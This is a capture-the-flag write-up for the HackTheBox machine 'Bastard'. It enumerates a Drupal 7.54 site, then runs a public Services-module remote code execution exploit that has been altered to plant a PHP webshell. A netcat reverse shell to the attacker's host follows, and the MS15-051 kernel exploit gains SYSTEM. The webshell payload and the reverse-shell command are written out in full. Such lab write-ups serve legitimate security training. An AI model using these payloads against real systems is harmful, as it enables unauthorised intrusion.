Bastard

A medium box from HackTheBox, use a vulnerability in a Drupal plugin to get initial access, then a kernel exploit for privesc.

Recon

Regular nmap

sudo nmap -sC -sV -oA nmap/init 10.10.10.9

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

On port 80 find a Drupal instance, running Drupal 7

Next up, gobuster for directories

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt --url http://10.10.10.9

Dont find anything interesting immediately, but the presence of /rest/ will be important later

Then gobuster for files

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt --url http://10.10.10.9

And find a /changelog.txt on the webroot, exposing that the version of Drupal is 7.54

Running a more specific scan, run droopescan to enumerate the plugins running on the server

droopescan scan drupal -u 10.10.10.9

This one takes year to complete, but eventually get the output

[+] Themes found:
    seven http://10.10.10.9/themes/seven/
    garland http://10.10.10.9/themes/garland/

[+] Possible interesting urls found:
    Default changelog file - http://10.10.10.9/CHANGELOG.txt
    Default admin - http://10.10.10.9/user/login

[+] Possible version(s):
    7.54

[+] Plugins found:
    ctools http://10.10.10.9/sites/all/modules/ctools/
        http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.txt
        http://10.10.10.9/sites/all/modules/ctools/changelog.txt
        http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.TXT
        http://10.10.10.9/sites/all/modules/ctools/LICENSE.txt
        http://10.10.10.9/sites/all/modules/ctools/API.txt
    libraries http://10.10.10.9/sites/all/modules/libraries/
        http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.txt
        http://10.10.10.9/sites/all/modules/libraries/changelog.txt
        http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.TXT
        http://10.10.10.9/sites/all/modules/libraries/README.txt
        http://10.10.10.9/sites/all/modules/libraries/readme.txt
        http://10.10.10.9/sites/all/modules/libraries/README.TXT
        http://10.10.10.9/sites/all/modules/libraries/LICENSE.txt
    services http://10.10.10.9/sites/all/modules/services/
        http://10.10.10.9/sites/all/modules/services/README.txt
        http://10.10.10.9/sites/all/modules/services/readme.txt
        http://10.10.10.9/sites/all/modules/services/README.TXT
        http://10.10.10.9/sites/all/modules/services/LICENSE.txt
    image http://10.10.10.9/modules/image/
    profile http://10.10.10.9/modules/profile/
    php http://10.10.10.9/modules/php/

[+] Scan finished (0:35:53.627982 elapsed)

Then when running searchsploit with drupal, see an exploit involving Drupal 7.x and the services plugin

searchsploit drupal 7

...

Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php

...

Exploitation

Download the exploit to the current directory

searchsploit -m php/webapps/41564.php

FIring it immediately , it oesn’t work with -h or giving it a target - so read up on it using the writeup link inside the file

At the end of the writeup, the authors write - “…one has to guess or find the endpoint URL, which mitigates the vulnerability a bit”

So inside the file need to change the endpoint variable from “endpoint_path=/rest_endpoint” to the one that we found in the gobuster enumeration - “enpoint_path=/rest”

Since the exploit writes a file to the web root, can change the default php file to a webshell

Changing

$file = [
    'filename' => 'dixuSOspsOUU.php',
    'data' => '<?php eval(file_get_contents(\'php://input\')); ?>'
];

To

$file = [
    'filename' => 'rev.php',
    'data' => '<?php system($_GET[\'cmd\']); ?>'
];

Then change the target IP within the file as well

$url = http://IP;

Then fire the exploit with

php 41564.php

Now with the webshell, can use the windows version of netcat, nc.exe, to get reverse shell

Copying nc.exe to the working directory, then using the impacket smbscript to access it from the target via webshell

/opt/impacket/examples/smbserver.py share .

And then use the webshell to get a reverse shell by setting up a netcat listener on port 4444 and going to

http://10.10.10.9/rev.php?cmd=\\KALI_IP\share\nc.exe -e cmd.exe KALI_IP 4444

To catch the reverse shell and get the user flag

Now on the box, run systeminfo and see that there are no hotfixes applied to the box, so a kernel exploit should be easy

Ill opt to use MS15-051, since its easy and has a executable ready to go off github

Transferring it to the victim via SMB Server again, run it with cmd.exe as the command to run as nt authority\system to get root!

C:\inetpub\drupal-7.54> exploit.exe cmd.exe

C:\inetpub\drupal-7.54> whoami
nt authority\system

Bastard

Recon #

Exploitation #

Recon

Exploitation